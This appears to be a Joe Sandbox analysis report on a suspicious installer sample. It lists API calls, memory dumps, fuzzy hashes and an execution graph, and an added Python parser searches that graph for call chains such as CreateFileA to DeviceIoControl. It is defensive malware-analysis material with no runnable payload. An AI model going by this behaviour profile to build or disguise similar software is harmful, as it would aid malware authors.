• RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
Strings
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
• %s\%s_is1, xrefs: 00478F10
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1598650737
• Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
• Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
• Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
• Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ExecuteMessageSendShell
• String ID: open
• API String ID: 812272486-2758837156
• Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
• Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
• Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
• Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
• GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: DirectoryErrorExecuteLastShellSystem
• String ID: <
• API String ID: 893404051-4251816714
• Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
• Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
• Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
• Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
• RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AllocInitializeLocal
• String ID: )
• API String ID: 2227675388-1084416617
• Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
• Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
• Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
• Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
• Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
• Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
• Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
• Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
APIs
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• SysFreeString.OLEAUT32(?), ref: 004474C6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: String$AllocByteCharFreeMultiWide
• String ID: NIL Interface Exception$Unknown Method
• API String ID: 3952431833-1023667238
• Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
• Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
• Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
• Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
• CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
  • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: 0nI
• API String ID: 3798668922-794067871
• Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
• Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
• Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
• Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
APIs
• RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
• RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Value$EnumQuery
• String ID: Inno Setup: No Icons
• API String ID: 1576479698-2016326496
• Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
• Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
• Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
• Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
APIs
• SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
• GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID: T$H
• API String ID: 1799206407-488339322
• Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
• Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
• Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
• Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
APIs
• DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
• GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: T$H
• API String ID: 2018770650-488339322
• Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
• Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
• Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
• Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
APIs
• RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
• GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: DirectoryErrorLastRemove
• String ID: T$H
• API String ID: 377330604-488339322
• Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
• Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
• Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
• Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
APIs
  • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(74350000,00481A2F), ref: 0047D0E2
  • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
  • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
• GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
• TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
Strings
• Detected restart. Removing temporary directory., xrefs: 00498013
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
• String ID: Detected restart. Removing temporary directory.
• API String ID: 1717587489-3199836293
• Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
• Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
• Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
• Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
APIs
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ErrorLastSleep
• String ID:
• API String ID: 1458359878-0
• Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
• Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
• Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
• Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

Execution Graph

Execution Coverage: 1%
Dynamic/Decrypted Code Coverage: 69.9%
Signature Coverage: 17%
Total number of Nodes: 481
Total number of Limit Nodes: 26
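The execution_graph dump that follows is a flat token stream rather than a drawn graph: each node appears as a decimal node id, a hex address and optional annotation words (API names, "N API calls", symbolizer labels), and each edge as id->id. A reviewer usually wants the graph back in structured form to ask ordered questions of it, for example whether a handle opened with CreateFileA is later driven with DeviceIoControl, or whether a LoadLibraryA/GetProcAddress resolution leads to GetAdaptersInfo. The parser below is an added example and not Joe Sandbox tooling; its reading of the token format is inferred from the graph on this page and is an assumption, as is the treatment of any uppercase-initial annotation as an export name. Its input is a constructed excerpt copied from the graph on this page.

```python
"""Parse a Joe Sandbox execution_graph token stream and search it for ordered
API call chains. Added example, not Joe Sandbox's own tooling. The token format
is inferred from the graph on this report page and is an assumption:
a node is '<decimal id> <hex address> [annotation words...]', an edge is
'<id>-><id>', and annotation words belong to the most recently opened node."""
import re
from collections import deque

EDGE = re.compile(r"(\d+)->(\d+)")
DECIMAL = re.compile(r"\d+")
HEX_ADDR = re.compile(r"[0-9a-f]{5,8}")
# Heuristic for Win32/ntdll export names among the annotations: an uppercase
# initial plus at least one lowercase letter, which skips 'API', 'calls', digits.
EXPORT_NAME = re.compile(r"[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*")

# Constructed input: an excerpt copied from the execution graph on this page.
EXCERPT = (
    "execution_graph 61358 2c0e8a8 CreateFileA 61359 2c0e9a4 61358->61359 "
    "61362 2c0e8d9 61358->61362 61360 2c0e8f1 DeviceIoControl 61360->61362 "
    "61361 2c0e99a CloseHandle 61361->61359 61362->61360 61362->61361 "
    "61363 2c0e966 GetLastError 61362->61363 "
    "61365 2c127c5 60 API calls 3 library calls 61362->61365 61363->61361 "
    "61363->61362 61365->61362 61366 2c0e9ac LoadLibraryA "
    "61367 2c0e9d5 GetProcAddress 61366->61367 61368 2c0ea8f 61366->61368 "
    "61369 2c0ea88 FreeLibrary 61367->61369 61372 2c0e9e9 61367->61372 "
    "61369->61368 61370 2c0e9fb GetAdaptersInfo 61370->61372 61371 2c0ea83 "
    "61371->61369 61372->61370 61372->61371 61372->61372 "
    "61374 2c127c5 60 API calls 3 library calls 61372->61374 61374->61372"
)


def parse_execution_graph(text):
    """Return (nodes, succ): nodes maps id -> {'addr': str, 'notes': [str]},
    succ maps id -> successor ids in the order the edges were listed."""
    toks = text.split()
    if toks and toks[0] == "execution_graph":
        toks = toks[1:]
    nodes, succ, current, i = {}, {}, None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.fullmatch(tok)
        if m:
            succ.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
            continue
        # A node record opens with a decimal id followed by a hex address.
        if (DECIMAL.fullmatch(tok) and i + 1 < len(toks)
                and HEX_ADDR.fullmatch(toks[i + 1])):
            current = int(tok)
            nodes[current] = {"addr": toks[i + 1], "notes": []}
            i += 2
            continue
        # Everything else annotates the node that was opened last.
        if current is not None:
            nodes[current]["notes"].append(tok)
        i += 1
    return nodes, succ


def export_names(nodes):
    """Distinct annotation tokens that look like API export names."""
    return sorted({t for rec in nodes.values() for t in rec["notes"]
                   if EXPORT_NAME.fullmatch(t)})


def _paths_to_api(nodes, succ, start, api, max_hops):
    """BFS from start; shortest paths to nodes annotated with api, stopping at
    the first matching node on each branch."""
    found, seen = [], {start}
    queue = deque([(start, [start])])
    while queue:
        node, path = queue.popleft()
        if len(path) - 1 >= max_hops:
            continue
        for nxt in succ.get(node, []):
            if nxt in seen:
                continue
            seen.add(nxt)
            new_path = path + [nxt]
            if api in nodes.get(nxt, {}).get("notes", []):
                found.append(new_path)
            else:
                queue.append((nxt, new_path))
    return found


def find_api_chains(nodes, succ, apis, max_hops=4):
    """Every path that hits the APIs in `apis` in order, with at most
    max_hops edges between consecutive hits."""
    chains = [[n] for n, rec in nodes.items() if apis[0] in rec["notes"]]
    for api in apis[1:]:
        chains = [chain + tail[1:] for chain in chains
                  for tail in _paths_to_api(nodes, succ, chain[-1], api, max_hops)]
    return chains


if __name__ == "__main__":
    nodes, succ = parse_execution_graph(EXCERPT)
    print(len(nodes), "nodes;", "exports:", ", ".join(export_names(nodes)))
    for chain in (["CreateFileA", "DeviceIoControl"],
                  ["LoadLibraryA", "GetProcAddress", "GetAdaptersInfo"]):
        for path in find_api_chains(nodes, succ, chain):
            print(" -> ".join(f"{n}@{nodes[n]['addr']}" for n in path))
```

Running it on the excerpt reconstructs 15 nodes and reports both chains, CreateFileA at 2c0e8a8 reaching DeviceIoControl at 2c0e8f1 in two hops, and LoadLibraryA at 2c0e9ac reaching GetAdaptersInfo at 2c0e9fb through the GetProcAddress node. The search stops at the first matching node on each branch and bounds hop count, so on the full 481-node graph it stays cheap; raise max_hops if a chain passes through many annotation-free nodes.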
                                                                                                                                        execution_graph 61208 401f60 61209 40dcda VirtualAlloc 61208->61209 61210 402a20 GetVersion 61234 403b64 HeapCreate 61210->61234 61212 402a7f 61213 402a84 61212->61213 61214 402a8c 61212->61214 61309 402b3b 8 API calls 61213->61309 61246 403844 61214->61246 61218 402a94 GetCommandLineA 61260 403712 61218->61260 61222 402aae 61292 40340c 61222->61292 61224 402ab3 61225 402ab8 GetStartupInfoA 61224->61225 61305 4033b4 61225->61305 61227 402aca GetModuleHandleA 61229 402aee 61227->61229 61310 40315b GetCurrentProcess TerminateProcess ExitProcess 61229->61310 61231 402af7 61311 403230 UnhandledExceptionFilter 61231->61311 61233 402b08 61235 403b84 61234->61235 61236 403bba 61234->61236 61312 403a1c 19 API calls 61235->61312 61236->61212 61238 403b89 61239 403ba0 61238->61239 61240 403b93 61238->61240 61242 403bbd 61239->61242 61314 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61239->61314 61313 403f3b HeapAlloc 61240->61313 61242->61212 61244 403b9d 61244->61242 61245 403bae HeapDestroy 61244->61245 61245->61236 61315 402b5f 61246->61315 61249 403863 GetStartupInfoA 61252 4038af 61249->61252 61253 403974 61249->61253 61252->61253 61257 402b5f 12 API calls 61252->61257 61259 403920 61252->61259 61254 40399b GetStdHandle 61253->61254 61255 4039db SetHandleCount 61253->61255 61254->61253 61256 4039a9 GetFileType 61254->61256 61255->61218 61256->61253 61257->61252 61258 403942 GetFileType 61258->61259 61259->61253 61259->61258 61261 403760 61260->61261 61262 40372d GetEnvironmentStringsW 61260->61262 61263 403751 61261->61263 61265 403735 61261->61265 61264 403741 GetEnvironmentStrings 61262->61264 61262->61265 61266 402aa4 61263->61266 61269 4037f3 GetEnvironmentStrings 61263->61269 61270 4037ff 61263->61270 61264->61263 61264->61266 61267 403779 WideCharToMultiByte 61265->61267 61268 40376d GetEnvironmentStringsW 

Control-flow Graph
APIs
• RtlInitializeCriticalSection.NTDLL(02C34FD0), ref: 02C05E93
• GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C05EAA
• GetProcAddress.KERNEL32(00000000), ref: 02C05EB3
• GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C05EC2
• GetProcAddress.KERNEL32(00000000), ref: 02C05EC5
• GetTickCount.KERNEL32 ref: 02C05ED9
  • Part of subcall function 02C059FA: _malloc.LIBCMT ref: 02C05A08
• GetVersionExA.KERNEL32(02C34E20), ref: 02C05F06
• _memset.LIBCMT ref: 02C05F25
• _malloc.LIBCMT ref: 02C05F32
  • Part of subcall function 02C11FBC: __FF_MSGBANNER.LIBCMT ref: 02C11FD3
  • Part of subcall function 02C11FBC: __NMSG_WRITE.LIBCMT ref: 02C11FDA
  • Part of subcall function 02C11FBC: RtlAllocateHeap.NTDLL(00880000,00000000,00000001), ref: 02C11FFF
• _malloc.LIBCMT ref: 02C05F42
• _malloc.LIBCMT ref: 02C05F4D
• _malloc.LIBCMT ref: 02C05F58
• _malloc.LIBCMT ref: 02C05F63
• _malloc.LIBCMT ref: 02C05F6E
• _malloc.LIBCMT ref: 02C05F79
• _malloc.LIBCMT ref: 02C05F85
• GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C05F9C
• RtlAllocateHeap.NTDLL(00000000), ref: 02C05FA5
• GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C05FB1
• RtlAllocateHeap.NTDLL(00000000), ref: 02C05FB4
• GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C05FBF
• RtlAllocateHeap.NTDLL(00000000), ref: 02C05FC2
• _memset.LIBCMT ref: 02C05FD2
• _memset.LIBCMT ref: 02C05FDE
• _memset.LIBCMT ref: 02C05FEB
• RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C05FF9
• RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06006
• _malloc.LIBCMT ref: 02C06027
• _malloc.LIBCMT ref: 02C06035
• _malloc.LIBCMT ref: 02C0603C
• _malloc.LIBCMT ref: 02C0605D
• QueryPerformanceCounter.KERNEL32(00000200), ref: 02C06069
• Sleep.KERNELBASE(00000000), ref: 02C06077
• _malloc.LIBCMT ref: 02C06083
• _malloc.LIBCMT ref: 02C06093
• _memset.LIBCMT ref: 02C060A8
• _memset.LIBCMT ref: 02C060B8
• Sleep.KERNELBASE(0000EA60), ref: 02C06105
• RtlEnterCriticalSection.NTDLL(02C34FD0), ref: 02C06110
• RtlLeaveCriticalSection.NTDLL(02C34FD0), ref: 02C06121
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
